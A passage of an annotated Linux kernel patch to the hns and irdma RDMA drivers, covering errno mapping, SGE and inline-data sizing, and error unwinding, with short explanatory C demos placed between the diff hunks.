+-		hr_qp = to_hr_qp(free_mr->rsv_qp[i]);
++		hr_qp = free_mr->rsv_qp[i];
+ 
+ 		ret = free_mr_post_send_lp_wqe(hr_qp);
+ 		if (ret) {
+@@ -3429,7 +3546,7 @@ static void free_mr_send_cmd_to_hw(struct hns_roce_dev *hr_dev)
+ 
+ 	end = msecs_to_jiffies(HNS_ROCE_V2_FREE_MR_TIMEOUT) + jiffies;
+ 	while (cqe_cnt) {
+-		npolled = hns_roce_v2_poll_cq(free_mr->rsv_cq, cqe_cnt, wc);
++		npolled = hns_roce_v2_poll_cq(&free_mr->rsv_cq->ib_cq, cqe_cnt, wc);
+ 		if (npolled < 0) {
+ 			ibdev_err(ibdev,
+ 				  "failed to poll cqe for free mr, remain %d cqe.\n",
+@@ -5375,6 +5492,8 @@ static int hns_roce_v2_query_qp(struct ib_qp *ibqp, struct ib_qp_attr *qp_attr,
+ 
+ 		rdma_ah_set_sl(&qp_attr->ah_attr,
+ 			       hr_reg_read(&context, QPC_SL));
++		rdma_ah_set_port_num(&qp_attr->ah_attr, hr_qp->port + 1);
++		rdma_ah_set_ah_flags(&qp_attr->ah_attr, IB_AH_GRH);
+ 		grh->flow_label = hr_reg_read(&context, QPC_FL);
+ 		grh->sgid_index = hr_reg_read(&context, QPC_GMV_IDX);
+ 		grh->hop_limit = hr_reg_read(&context, QPC_HOPLIMIT);
+@@ -5468,7 +5587,7 @@ static int hns_roce_v2_destroy_qp_common(struct hns_roce_dev *hr_dev,
+ 	return ret;
+ }
+ 
+-static int hns_roce_v2_destroy_qp(struct ib_qp *ibqp, struct ib_udata *udata)
++int hns_roce_v2_destroy_qp(struct ib_qp *ibqp, struct ib_udata *udata)
+ {
+ 	struct hns_roce_dev *hr_dev = to_hr_dev(ibqp->device);
+ 	struct hns_roce_qp *hr_qp = to_hr_qp(ibqp);
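
Among the hw_v2.c changes, hns_roce_cmd_err_convert_errno() replaces a blanket -EIO with a table lookup so each firmware status maps to a meaningful errno. The shape lifts cleanly into a standalone demo (status values here are illustrative stand-ins for the CMD_* enum):

	#include <errno.h>
	#include <stdint.h>
	#include <stdio.h>

	struct errcode { uint16_t status; int err; };

	static const struct errcode table[] = {
		{ 0x0, 0 },		/* CMD_EXEC_SUCCESS */
		{ 0x1, -EPERM },	/* CMD_NO_AUTH */
		{ 0x2, -EOPNOTSUPP },	/* CMD_NOT_EXIST */
		{ 0x6, -EINVAL },	/* CMD_PARA_ERR */
	};

	static int convert_errno(uint16_t status)
	{
		for (size_t i = 0; i < sizeof(table) / sizeof(table[0]); i++)
			if (table[i].status == status)
				return table[i].err;
		return -EIO;	/* unknown status: fall back to the old behaviour */
	}

	int main(void)
	{
		printf("%d %d\n", convert_errno(0x6), convert_errno(0xff));	/* -22 -5 */
		return 0;
	}
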
+diff --git a/drivers/infiniband/hw/hns/hns_roce_hw_v2.h b/drivers/infiniband/hw/hns/hns_roce_hw_v2.h
+index c7bf2d52c1cdb..b1b3e1e0b84e5 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_hw_v2.h
++++ b/drivers/infiniband/hw/hns/hns_roce_hw_v2.h
+@@ -272,6 +272,11 @@ enum hns_roce_cmd_return_status {
+ 	CMD_OTHER_ERR = 0xff
+ };
+ 
++struct hns_roce_cmd_errcode {
++	enum hns_roce_cmd_return_status return_status;
++	int errno;
++};
++
+ enum hns_roce_sgid_type {
+ 	GID_TYPE_FLAG_ROCE_V1 = 0,
+ 	GID_TYPE_FLAG_ROCE_V2_IPV4,
+@@ -1327,9 +1332,9 @@ struct hns_roce_link_table {
+ #define HNS_ROCE_EXT_LLM_MIN_PAGES(que_num) ((que_num) * 4 + 2)
+ 
+ struct hns_roce_v2_free_mr {
+-	struct ib_qp *rsv_qp[HNS_ROCE_FREE_MR_USED_QP_NUM];
+-	struct ib_cq *rsv_cq;
+-	struct ib_pd *rsv_pd;
++	struct hns_roce_qp *rsv_qp[HNS_ROCE_FREE_MR_USED_QP_NUM];
++	struct hns_roce_cq *rsv_cq;
++	struct hns_roce_pd *rsv_pd;
+ 	struct mutex mutex;
+ };
+ 
+@@ -1459,6 +1464,8 @@ struct hns_roce_sccc_clr_done {
+ 	__le32 rsv[5];
+ };
+ 
++int hns_roce_v2_destroy_qp(struct ib_qp *ibqp, struct ib_udata *udata);
++
+ static inline void hns_roce_write64(struct hns_roce_dev *hr_dev, __le32 val[2],
+ 				    void __iomem *dest)
+ {
+diff --git a/drivers/infiniband/hw/hns/hns_roce_main.c b/drivers/infiniband/hw/hns/hns_roce_main.c
+index dcf89689a4c62..8ba68ac12388d 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_main.c
++++ b/drivers/infiniband/hw/hns/hns_roce_main.c
+@@ -354,10 +354,11 @@ static int hns_roce_alloc_uar_entry(struct ib_ucontext *uctx)
+ static int hns_roce_alloc_ucontext(struct ib_ucontext *uctx,
+ 				   struct ib_udata *udata)
+ {
+-	int ret;
+ 	struct hns_roce_ucontext *context = to_hr_ucontext(uctx);
+-	struct hns_roce_ib_alloc_ucontext_resp resp = {};
+ 	struct hns_roce_dev *hr_dev = to_hr_dev(uctx->device);
++	struct hns_roce_ib_alloc_ucontext_resp resp = {};
++	struct hns_roce_ib_alloc_ucontext ucmd = {};
++	int ret;
+ 
+ 	if (!hr_dev->active)
+ 		return -EAGAIN;
+@@ -365,6 +366,19 @@ static int hns_roce_alloc_ucontext(struct ib_ucontext *uctx,
+ 	resp.qp_tab_size = hr_dev->caps.num_qps;
+ 	resp.srq_tab_size = hr_dev->caps.num_srqs;
+ 
++	ret = ib_copy_from_udata(&ucmd, udata,
++				 min(udata->inlen, sizeof(ucmd)));
++	if (ret)
++		return ret;
++
++	if (hr_dev->pci_dev->revision >= PCI_REVISION_ID_HIP09)
++		context->config = ucmd.config & HNS_ROCE_EXSGE_FLAGS;
++
++	if (context->config & HNS_ROCE_EXSGE_FLAGS) {
++		resp.config |= HNS_ROCE_RSP_EXSGE_FLAGS;
++		resp.max_inline_data = hr_dev->caps.max_sq_inline;
++	}
++
+ 	ret = hns_roce_uar_alloc(hr_dev, &context->uar);
+ 	if (ret)
+ 		goto error_fail_uar_alloc;
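
Copying the user command with min(udata->inlen, sizeof(ucmd)) is the standard uverbs compatibility idiom: an older userspace passing a shorter struct still works, and the tail of ucmd stays zeroed from its `= {}` initializer. A sketch of the shape:

	struct hns_roce_ib_alloc_ucontext ucmd = {};	/* zero the tail for short copies */

	ret = ib_copy_from_udata(&ucmd, udata, min(udata->inlen, sizeof(ucmd)));
	if (ret)
		return ret;
	/* fields absent from an old userspace simply read as 0 here */
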
+diff --git a/drivers/infiniband/hw/hns/hns_roce_mr.c b/drivers/infiniband/hw/hns/hns_roce_mr.c
+index 845ac7d3831f4..37a5cf62f88b4 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_mr.c
++++ b/drivers/infiniband/hw/hns/hns_roce_mr.c
+@@ -392,10 +392,10 @@ struct ib_mr *hns_roce_alloc_mr(struct ib_pd *pd, enum ib_mr_type mr_type,
+ 
+ 	return &mr->ibmr;
+ 
+-err_key:
+-	free_mr_key(hr_dev, mr);
+ err_pbl:
+ 	free_mr_pbl(hr_dev, mr);
++err_key:
++	free_mr_key(hr_dev, mr);
+ err_free:
+ 	kfree(mr);
+ 	return ERR_PTR(ret);
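
The swapped labels in hns_roce_mr.c restore the rule that error unwinding releases resources in reverse order of acquisition, with fall-through labels each undoing exactly the steps that succeeded before the jump. A compact runnable illustration of the idiom:

	#include <errno.h>
	#include <stdint.h>
	#include <stdio.h>
	#include <stdlib.h>

	/* Acquire a, then b, then c; labels fall through, unwinding in reverse. */
	static int setup(void)
	{
		void *a, *b, *c;
		int ret = -ENOMEM;

		a = malloc(16);
		if (!a)
			goto err;
		b = malloc(16);
		if (!b)
			goto err_a;
		c = malloc(SIZE_MAX);		/* likely fails, exercising the unwind */
		if (!c)
			goto err_b;

		free(c); free(b); free(a);
		return 0;

	err_b:
		free(b);	/* last acquired, first released */
	err_a:
		free(a);
	err:
		return ret;
	}

	int main(void)
	{
		printf("setup() = %d\n", setup());
		return 0;
	}
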
+diff --git a/drivers/infiniband/hw/hns/hns_roce_qp.c b/drivers/infiniband/hw/hns/hns_roce_qp.c
+index f0bd82a18069a..0ae335fb205ca 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_qp.c
++++ b/drivers/infiniband/hw/hns/hns_roce_qp.c
+@@ -476,38 +476,109 @@ static int set_rq_size(struct hns_roce_dev *hr_dev, struct ib_qp_cap *cap,
+ 	return 0;
+ }
+ 
+-static u32 get_wqe_ext_sge_cnt(struct hns_roce_qp *qp)
++static u32 get_max_inline_data(struct hns_roce_dev *hr_dev,
++			       struct ib_qp_cap *cap)
+ {
+-	/* GSI/UD QP only has extended sge */
+-	if (qp->ibqp.qp_type == IB_QPT_GSI || qp->ibqp.qp_type == IB_QPT_UD)
+-		return qp->sq.max_gs;
+-
+-	if (qp->sq.max_gs > HNS_ROCE_SGE_IN_WQE)
+-		return qp->sq.max_gs - HNS_ROCE_SGE_IN_WQE;
++	if (cap->max_inline_data) {
++		cap->max_inline_data = roundup_pow_of_two(cap->max_inline_data);
++		return min(cap->max_inline_data,
++			   hr_dev->caps.max_sq_inline);
++	}
+ 
+ 	return 0;
+ }
+ 
++static void update_inline_data(struct hns_roce_qp *hr_qp,
++			       struct ib_qp_cap *cap)
++{
++	u32 sge_num = hr_qp->sq.ext_sge_cnt;
++
++	if (hr_qp->config & HNS_ROCE_EXSGE_FLAGS) {
++		if (!(hr_qp->ibqp.qp_type == IB_QPT_GSI ||
++		      hr_qp->ibqp.qp_type == IB_QPT_UD))
++			sge_num = max((u32)HNS_ROCE_SGE_IN_WQE, sge_num);
++
++		cap->max_inline_data = max(cap->max_inline_data,
++					   sge_num * HNS_ROCE_SGE_SIZE);
++	}
++
++	hr_qp->max_inline_data = cap->max_inline_data;
++}
++
++static u32 get_sge_num_from_max_send_sge(bool is_ud_or_gsi,
++					 u32 max_send_sge)
++{
++	unsigned int std_sge_num;
++	unsigned int min_sge;
++
++	std_sge_num = is_ud_or_gsi ? 0 : HNS_ROCE_SGE_IN_WQE;
++	min_sge = is_ud_or_gsi ? 1 : 0;
++	return max_send_sge > std_sge_num ? (max_send_sge - std_sge_num) :
++				min_sge;
++}
++
++static unsigned int get_sge_num_from_max_inl_data(bool is_ud_or_gsi,
++						  u32 max_inline_data)
++{
++	unsigned int inline_sge;
++
++	inline_sge = roundup_pow_of_two(max_inline_data) / HNS_ROCE_SGE_SIZE;
++
++	/*
++	 * if max_inline_data less than
++	 * HNS_ROCE_SGE_IN_WQE * HNS_ROCE_SGE_SIZE,
++	 * In addition to ud's mode, no need to extend sge.
++	 */
++	if (!is_ud_or_gsi && inline_sge <= HNS_ROCE_SGE_IN_WQE)
++		inline_sge = 0;
++
++	return inline_sge;
++}
++
+ static void set_ext_sge_param(struct hns_roce_dev *hr_dev, u32 sq_wqe_cnt,
+ 			      struct hns_roce_qp *hr_qp, struct ib_qp_cap *cap)
+ {
++	bool is_ud_or_gsi = (hr_qp->ibqp.qp_type == IB_QPT_GSI ||
++				hr_qp->ibqp.qp_type == IB_QPT_UD);
++	unsigned int std_sge_num;
++	u32 inline_ext_sge = 0;
++	u32 ext_wqe_sge_cnt;
+ 	u32 total_sge_cnt;
+-	u32 wqe_sge_cnt;
++
++	cap->max_inline_data = get_max_inline_data(hr_dev, cap);
+ 
+ 	hr_qp->sge.sge_shift = HNS_ROCE_SGE_SHIFT;
++	std_sge_num = is_ud_or_gsi ? 0 : HNS_ROCE_SGE_IN_WQE;
++	ext_wqe_sge_cnt = get_sge_num_from_max_send_sge(is_ud_or_gsi,
++							cap->max_send_sge);
+ 
+-	hr_qp->sq.max_gs = max(1U, cap->max_send_sge);
++	if (hr_qp->config & HNS_ROCE_EXSGE_FLAGS) {
++		inline_ext_sge = max(ext_wqe_sge_cnt,
++				     get_sge_num_from_max_inl_data(is_ud_or_gsi,
++							 cap->max_inline_data));
++		hr_qp->sq.ext_sge_cnt = inline_ext_sge ?
++					roundup_pow_of_two(inline_ext_sge) : 0;
+ 
+-	wqe_sge_cnt = get_wqe_ext_sge_cnt(hr_qp);
++		hr_qp->sq.max_gs = max(1U, (hr_qp->sq.ext_sge_cnt + std_sge_num));
++		hr_qp->sq.max_gs = min(hr_qp->sq.max_gs, hr_dev->caps.max_sq_sg);
++
++		ext_wqe_sge_cnt = hr_qp->sq.ext_sge_cnt;
++	} else {
++		hr_qp->sq.max_gs = max(1U, cap->max_send_sge);
++		hr_qp->sq.max_gs = min(hr_qp->sq.max_gs, hr_dev->caps.max_sq_sg);
++		hr_qp->sq.ext_sge_cnt = hr_qp->sq.max_gs;
++	}
+ 
+ 	/* If the number of extended sge is not zero, they MUST use the
+ 	 * space of HNS_HW_PAGE_SIZE at least.
+ 	 */
+-	if (wqe_sge_cnt) {
+-		total_sge_cnt = roundup_pow_of_two(sq_wqe_cnt * wqe_sge_cnt);
++	if (ext_wqe_sge_cnt) {
++		total_sge_cnt = roundup_pow_of_two(sq_wqe_cnt * ext_wqe_sge_cnt);
+ 		hr_qp->sge.sge_cnt = max(total_sge_cnt,
+ 				(u32)HNS_HW_PAGE_SIZE / HNS_ROCE_SGE_SIZE);
+ 	}
++
++	update_inline_data(hr_qp, cap);
+ }
+ 
+ static int check_sq_size_with_integrity(struct hns_roce_dev *hr_dev,
+@@ -556,6 +627,7 @@ static int set_user_sq_size(struct hns_roce_dev *hr_dev,
+ 
+ 	hr_qp->sq.wqe_shift = ucmd->log_sq_stride;
+ 	hr_qp->sq.wqe_cnt = cnt;
++	cap->max_send_sge = hr_qp->sq.max_gs;
+ 
+ 	return 0;
+ }
+@@ -986,13 +1058,9 @@ static int set_qp_param(struct hns_roce_dev *hr_dev, struct hns_roce_qp *hr_qp,
+ 			struct hns_roce_ib_create_qp *ucmd)
+ {
+ 	struct ib_device *ibdev = &hr_dev->ib_dev;
++	struct hns_roce_ucontext *uctx;
+ 	int ret;
+ 
+-	if (init_attr->cap.max_inline_data > hr_dev->caps.max_sq_inline)
+-		init_attr->cap.max_inline_data = hr_dev->caps.max_sq_inline;
+-
+-	hr_qp->max_inline_data = init_attr->cap.max_inline_data;
+-
+ 	if (init_attr->sq_sig_type == IB_SIGNAL_ALL_WR)
+ 		hr_qp->sq_signal_bits = IB_SIGNAL_ALL_WR;
+ 	else
+@@ -1015,12 +1083,17 @@ static int set_qp_param(struct hns_roce_dev *hr_dev, struct hns_roce_qp *hr_qp,
+ 			return ret;
+ 		}
+ 
++		uctx = rdma_udata_to_drv_context(udata, struct hns_roce_ucontext,
++						 ibucontext);
++		hr_qp->config = uctx->config;
+ 		ret = set_user_sq_size(hr_dev, &init_attr->cap, hr_qp, ucmd);
+ 		if (ret)
+ 			ibdev_err(ibdev,
+ 				  "failed to set user SQ size, ret = %d.\n",
+ 				  ret);
+ 	} else {
++		if (hr_dev->pci_dev->revision >= PCI_REVISION_ID_HIP09)
++			hr_qp->config = HNS_ROCE_EXSGE_FLAGS;
+ 		ret = set_kernel_sq_size(hr_dev, &init_attr->cap, hr_qp);
+ 		if (ret)
+ 			ibdev_err(ibdev,
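
The reworked QP sizing above derives the extended-SGE count from whichever is larger: the SGEs requested beyond those that fit in the base WQE, or the SGEs needed to hold the requested inline data, rounded up to a power of two. The arithmetic in isolation, for an RC QP (a simplified runnable sketch; constants mirror HNS_ROCE_SGE_SIZE = 16 and HNS_ROCE_SGE_IN_WQE = 2):

	#include <stdint.h>
	#include <stdio.h>

	#define SGE_SIZE	16	/* HNS_ROCE_SGE_SIZE */
	#define SGE_IN_WQE	2	/* HNS_ROCE_SGE_IN_WQE */

	static uint32_t roundup_pow_of_two(uint32_t n)
	{
		uint32_t r = 1;

		while (r < n)
			r <<= 1;
		return r;
	}

	static uint32_t ext_sge_cnt(uint32_t max_send_sge, uint32_t max_inline)
	{
		uint32_t from_sge = max_send_sge > SGE_IN_WQE ?
				    max_send_sge - SGE_IN_WQE : 0;
		uint32_t from_inl = roundup_pow_of_two(max_inline) / SGE_SIZE;
		uint32_t need;

		if (from_inl <= SGE_IN_WQE)	/* small inline fits the base WQE */
			from_inl = 0;
		need = from_sge > from_inl ? from_sge : from_inl;
		return need ? roundup_pow_of_two(need) : 0;
	}

	int main(void)
	{
		printf("%u\n", ext_sge_cnt(4, 0));	/* 2: two SGEs overflow the WQE */
		printf("%u\n", ext_sge_cnt(2, 200));	/* 16: inline data drives sizing */
		return 0;
	}
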
+diff --git a/drivers/infiniband/hw/irdma/uk.c b/drivers/infiniband/hw/irdma/uk.c
+index a6e5d350a94ce..16183e894da77 100644
+--- a/drivers/infiniband/hw/irdma/uk.c
++++ b/drivers/infiniband/hw/irdma/uk.c
+@@ -566,21 +566,37 @@ static void irdma_set_mw_bind_wqe_gen_1(__le64 *wqe,
+ 
+ /**
+  * irdma_copy_inline_data_gen_1 - Copy inline data to wqe
+- * @dest: pointer to wqe
+- * @src: pointer to inline data
+- * @len: length of inline data to copy
++ * @wqe: pointer to wqe
++ * @sge_list: table of pointers to inline data
++ * @num_sges: Total inline data length
+  * @polarity: compatibility parameter
+  */
+-static void irdma_copy_inline_data_gen_1(u8 *dest, u8 *src, u32 len,
+-					 u8 polarity)
++static void irdma_copy_inline_data_gen_1(u8 *wqe, struct ib_sge *sge_list,
++					 u32 num_sges, u8 polarity)
+ {
+-	if (len <= 16) {
+-		memcpy(dest, src, len);
+-	} else {
+-		memcpy(dest, src, 16);
+-		src += 16;
+-		dest = dest + 32;
+-		memcpy(dest, src, len - 16);
++	u32 quanta_bytes_remaining = 16;
++	int i;
++
++	for (i = 0; i < num_sges; i++) {
++		u8 *cur_sge = (u8 *)(uintptr_t)sge_list[i].addr;
++		u32 sge_len = sge_list[i].length;
++
++		while (sge_len) {
++			u32 bytes_copied;
++
++			bytes_copied = min(sge_len, quanta_bytes_remaining);
++			memcpy(wqe, cur_sge, bytes_copied);
++			wqe += bytes_copied;
++			cur_sge += bytes_copied;
++			quanta_bytes_remaining -= bytes_copied;
++			sge_len -= bytes_copied;
++
++			if (!quanta_bytes_remaining) {
++				/* Remaining inline bytes reside after hdr */
++				wqe += 16;
++				quanta_bytes_remaining = 32;
++			}
++		}
+ 	}
+ }
+ 
+@@ -612,35 +628,51 @@ static void irdma_set_mw_bind_wqe(__le64 *wqe,
+ 
+ /**
+  * irdma_copy_inline_data - Copy inline data to wqe
+- * @dest: pointer to wqe
+- * @src: pointer to inline data
+- * @len: length of inline data to copy
++ * @wqe: pointer to wqe
++ * @sge_list: table of pointers to inline data
++ * @num_sges: number of SGE's
+  * @polarity: polarity of wqe valid bit
+  */
+-static void irdma_copy_inline_data(u8 *dest, u8 *src, u32 len, u8 polarity)
++static void irdma_copy_inline_data(u8 *wqe, struct ib_sge *sge_list,
++				   u32 num_sges, u8 polarity)
+ {
+ 	u8 inline_valid = polarity << IRDMA_INLINE_VALID_S;
+-	u32 copy_size;
+-
+-	dest += 8;
+-	if (len <= 8) {
+-		memcpy(dest, src, len);
+-		return;
+-	}
+-
+-	*((u64 *)dest) = *((u64 *)src);
+-	len -= 8;
+-	src += 8;
+-	dest += 24; /* point to additional 32 byte quanta */
+-
+-	while (len) {
+-		copy_size = len < 31 ? len : 31;
+-		memcpy(dest, src, copy_size);
+-		*(dest + 31) = inline_valid;
+-		len -= copy_size;
+-		dest += 32;
+-		src += copy_size;
++	u32 quanta_bytes_remaining = 8;
++	bool first_quanta = true;
++	int i;
++
++	wqe += 8;
++
++	for (i = 0; i < num_sges; i++) {
++		u8 *cur_sge = (u8 *)(uintptr_t)sge_list[i].addr;
++		u32 sge_len = sge_list[i].length;
++
++		while (sge_len) {
++			u32 bytes_copied;
++
++			bytes_copied = min(sge_len, quanta_bytes_remaining);
++			memcpy(wqe, cur_sge, bytes_copied);
++			wqe += bytes_copied;
++			cur_sge += bytes_copied;
++			quanta_bytes_remaining -= bytes_copied;
++			sge_len -= bytes_copied;
++
++			if (!quanta_bytes_remaining) {
++				quanta_bytes_remaining = 31;
++
++				/* Remaining inline bytes reside after hdr */
++				if (first_quanta) {
++					first_quanta = false;
++					wqe += 16;
++				} else {
++					*wqe = inline_valid;
++					wqe++;
++				}
++			}
++		}
+ 	}
++	if (!first_quanta && quanta_bytes_remaining < 31)
++		*(wqe + quanta_bytes_remaining) = inline_valid;
+ }
+ 
+ /**
+@@ -679,20 +711,27 @@ int irdma_uk_inline_rdma_write(struct irdma_qp_uk *qp,
+ 			       struct irdma_post_sq_info *info, bool post_sq)
+ {
+ 	__le64 *wqe;
+-	struct irdma_inline_rdma_write *op_info;
++	struct irdma_rdma_write *op_info;
+ 	u64 hdr = 0;
+ 	u32 wqe_idx;
+ 	bool read_fence = false;
++	u32 i, total_size = 0;
+ 	u16 quanta;
+ 
+ 	info->push_wqe = qp->push_db ? true : false;
+-	op_info = &info->op.inline_rdma_write;
++	op_info = &info->op.rdma_write;
++
++	if (unlikely(qp->max_sq_frag_cnt < op_info->num_lo_sges))
++		return -EINVAL;
++
++	for (i = 0; i < op_info->num_lo_sges; i++)
++		total_size += op_info->lo_sg_list[i].length;
+ 
+-	if (op_info->len > qp->max_inline_data)
++	if (unlikely(total_size > qp->max_inline_data))
+ 		return -EINVAL;
+ 
+-	quanta = qp->wqe_ops.iw_inline_data_size_to_quanta(op_info->len);
+-	wqe = irdma_qp_get_next_send_wqe(qp, &wqe_idx, quanta, op_info->len,
++	quanta = qp->wqe_ops.iw_inline_data_size_to_quanta(total_size);
++	wqe = irdma_qp_get_next_send_wqe(qp, &wqe_idx, quanta, total_size,
+ 					 info);
+ 	if (!wqe)
+ 		return -ENOMEM;
+@@ -705,7 +744,7 @@ int irdma_uk_inline_rdma_write(struct irdma_qp_uk *qp,
+ 
+ 	hdr = FIELD_PREP(IRDMAQPSQ_REMSTAG, op_info->rem_addr.lkey) |
+ 	      FIELD_PREP(IRDMAQPSQ_OPCODE, info->op_type) |
+-	      FIELD_PREP(IRDMAQPSQ_INLINEDATALEN, op_info->len) |
++	      FIELD_PREP(IRDMAQPSQ_INLINEDATALEN, total_size) |
+ 	      FIELD_PREP(IRDMAQPSQ_REPORTRTT, info->report_rtt ? 1 : 0) |
+ 	      FIELD_PREP(IRDMAQPSQ_INLINEDATAFLAG, 1) |
+ 	      FIELD_PREP(IRDMAQPSQ_IMMDATAFLAG, info->imm_data_valid ? 1 : 0) |
+@@ -719,7 +758,8 @@ int irdma_uk_inline_rdma_write(struct irdma_qp_uk *qp,
+ 		set_64bit_val(wqe, 0,
+ 			      FIELD_PREP(IRDMAQPSQ_IMMDATA, info->imm_data));
+ 
+-	qp->wqe_ops.iw_copy_inline_data((u8 *)wqe, op_info->data, op_info->len,
++	qp->wqe_ops.iw_copy_inline_data((u8 *)wqe, op_info->lo_sg_list,
++					op_info->num_lo_sges,
+ 					qp->swqe_polarity);
+ 	dma_wmb(); /* make sure WQE is populated before valid bit is set */
+ 
+@@ -745,20 +785,27 @@ int irdma_uk_inline_send(struct irdma_qp_uk *qp,
+ 			 struct irdma_post_sq_info *info, bool post_sq)
+ {
+ 	__le64 *wqe;
+-	struct irdma_post_inline_send *op_info;
++	struct irdma_post_send *op_info;
+ 	u64 hdr;
+ 	u32 wqe_idx;
+ 	bool read_fence = false;
++	u32 i, total_size = 0;
+ 	u16 quanta;
+ 
+ 	info->push_wqe = qp->push_db ? true : false;
+-	op_info = &info->op.inline_send;
++	op_info = &info->op.send;
++
++	if (unlikely(qp->max_sq_frag_cnt < op_info->num_sges))
++		return -EINVAL;
+ 
+-	if (op_info->len > qp->max_inline_data)
++	for (i = 0; i < op_info->num_sges; i++)
++		total_size += op_info->sg_list[i].length;
++
++	if (unlikely(total_size > qp->max_inline_data))
+ 		return -EINVAL;
+ 
+-	quanta = qp->wqe_ops.iw_inline_data_size_to_quanta(op_info->len);
+-	wqe = irdma_qp_get_next_send_wqe(qp, &wqe_idx, quanta, op_info->len,
++	quanta = qp->wqe_ops.iw_inline_data_size_to_quanta(total_size);
++	wqe = irdma_qp_get_next_send_wqe(qp, &wqe_idx, quanta, total_size,
+ 					 info);
+ 	if (!wqe)
+ 		return -ENOMEM;
+@@ -773,7 +820,7 @@ int irdma_uk_inline_send(struct irdma_qp_uk *qp,
+ 	hdr = FIELD_PREP(IRDMAQPSQ_REMSTAG, info->stag_to_inv) |
+ 	      FIELD_PREP(IRDMAQPSQ_AHID, op_info->ah_id) |
+ 	      FIELD_PREP(IRDMAQPSQ_OPCODE, info->op_type) |
+-	      FIELD_PREP(IRDMAQPSQ_INLINEDATALEN, op_info->len) |
++	      FIELD_PREP(IRDMAQPSQ_INLINEDATALEN, total_size) |
+ 	      FIELD_PREP(IRDMAQPSQ_IMMDATAFLAG,
+ 			 (info->imm_data_valid ? 1 : 0)) |
+ 	      FIELD_PREP(IRDMAQPSQ_REPORTRTT, (info->report_rtt ? 1 : 0)) |
+@@ -789,8 +836,8 @@ int irdma_uk_inline_send(struct irdma_qp_uk *qp,
+ 	if (info->imm_data_valid)
+ 		set_64bit_val(wqe, 0,
+ 			      FIELD_PREP(IRDMAQPSQ_IMMDATA, info->imm_data));
+-	qp->wqe_ops.iw_copy_inline_data((u8 *)wqe, op_info->data, op_info->len,
+-					qp->swqe_polarity);
++	qp->wqe_ops.iw_copy_inline_data((u8 *)wqe, op_info->sg_list,
++					op_info->num_sges, qp->swqe_polarity);
+ 
+ 	dma_wmb(); /* make sure WQE is populated before valid bit is set */
+ 
+@@ -1002,11 +1049,10 @@ int irdma_uk_cq_poll_cmpl(struct irdma_cq_uk *cq,
+ 	__le64 *cqe;
+ 	struct irdma_qp_uk *qp;
+ 	struct irdma_ring *pring = NULL;
+-	u32 wqe_idx, q_type;
++	u32 wqe_idx;
+ 	int ret_code;
+ 	bool move_cq_head = true;
+ 	u8 polarity;
+-	u8 op_type;
+ 	bool ext_valid;
+ 	__le64 *ext_cqe;
+ 
+@@ -1074,7 +1120,7 @@ int irdma_uk_cq_poll_cmpl(struct irdma_cq_uk *cq,
+ 		info->ud_vlan_valid = false;
+ 	}
+ 
+-	q_type = (u8)FIELD_GET(IRDMA_CQ_SQ, qword3);
++	info->q_type = (u8)FIELD_GET(IRDMA_CQ_SQ, qword3);
+ 	info->error = (bool)FIELD_GET(IRDMA_CQ_ERROR, qword3);
+ 	info->push_dropped = (bool)FIELD_GET(IRDMACQ_PSHDROP, qword3);
+ 	info->ipv4 = (bool)FIELD_GET(IRDMACQ_IPV4, qword3);
+@@ -1113,8 +1159,9 @@ int irdma_uk_cq_poll_cmpl(struct irdma_cq_uk *cq,
+ 	}
+ 	wqe_idx = (u32)FIELD_GET(IRDMA_CQ_WQEIDX, qword3);
+ 	info->qp_handle = (irdma_qp_handle)(unsigned long)qp;
++	info->op_type = (u8)FIELD_GET(IRDMA_CQ_SQ, qword3);
+ 
+-	if (q_type == IRDMA_CQE_QTYPE_RQ) {
++	if (info->q_type == IRDMA_CQE_QTYPE_RQ) {
+ 		u32 array_idx;
+ 
+ 		array_idx = wqe_idx / qp->rq_wqe_size_multiplier;
+@@ -1134,10 +1181,6 @@ int irdma_uk_cq_poll_cmpl(struct irdma_cq_uk *cq,
+ 
+ 		info->bytes_xfered = (u32)FIELD_GET(IRDMACQ_PAYLDLEN, qword0);
+ 
+-		if (info->imm_valid)
+-			info->op_type = IRDMA_OP_TYPE_REC_IMM;
+-		else
+-			info->op_type = IRDMA_OP_TYPE_REC;
+ 		if (qword3 & IRDMACQ_STAG) {
+ 			info->stag_invalid_set = true;
+ 			info->inv_stag = (u32)FIELD_GET(IRDMACQ_INVSTAG, qword2);
+@@ -1195,17 +1238,18 @@ int irdma_uk_cq_poll_cmpl(struct irdma_cq_uk *cq,
+ 				sw_wqe = qp->sq_base[tail].elem;
+ 				get_64bit_val(sw_wqe, 24,
+ 					      &wqe_qword);
+-				op_type = (u8)FIELD_GET(IRDMAQPSQ_OPCODE, wqe_qword);
+-				info->op_type = op_type;
++				info->op_type = (u8)FIELD_GET(IRDMAQPSQ_OPCODE,
++							      wqe_qword);
+ 				IRDMA_RING_SET_TAIL(qp->sq_ring,
+ 						    tail + qp->sq_wrtrk_array[tail].quanta);
+-				if (op_type != IRDMAQP_OP_NOP) {
++				if (info->op_type != IRDMAQP_OP_NOP) {
+ 					info->wr_id = qp->sq_wrtrk_array[tail].wrid;
+ 					info->bytes_xfered = qp->sq_wrtrk_array[tail].wr_len;
+ 					break;
+ 				}
+ 			} while (1);
+-			if (op_type == IRDMA_OP_TYPE_BIND_MW && info->minor_err == FLUSH_PROT_ERR)
++			if (info->op_type == IRDMA_OP_TYPE_BIND_MW &&
++			    info->minor_err == FLUSH_PROT_ERR)
+ 				info->minor_err = FLUSH_MW_BIND_ERR;
+ 			qp->sq_flush_seen = true;
+ 			if (!IRDMA_RING_MORE_WORK(qp->sq_ring))
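
The rewritten irdma copy helpers let inline sends carry a full SGE list instead of a single buffer, streaming bytes across the WQE's quanta layout: 16 data bytes beside the first header, a 16-byte skip, then full 32-byte quanta. A runnable reduction of the gen_1 variant:

	#include <stdint.h>
	#include <stdio.h>
	#include <string.h>

	struct sge { const uint8_t *addr; uint32_t length; };

	/* gen_1 layout: 16 bytes fit beside the header, then 32-byte quanta */
	static void copy_inline_gen_1(uint8_t *wqe, const struct sge *sge_list,
				      uint32_t num_sges)
	{
		uint32_t quanta_bytes_remaining = 16;

		for (uint32_t i = 0; i < num_sges; i++) {
			const uint8_t *cur = sge_list[i].addr;
			uint32_t len = sge_list[i].length;

			while (len) {
				uint32_t n = len < quanta_bytes_remaining ?
					     len : quanta_bytes_remaining;

				memcpy(wqe, cur, n);
				wqe += n;
				cur += n;
				quanta_bytes_remaining -= n;
				len -= n;

				if (!quanta_bytes_remaining) {
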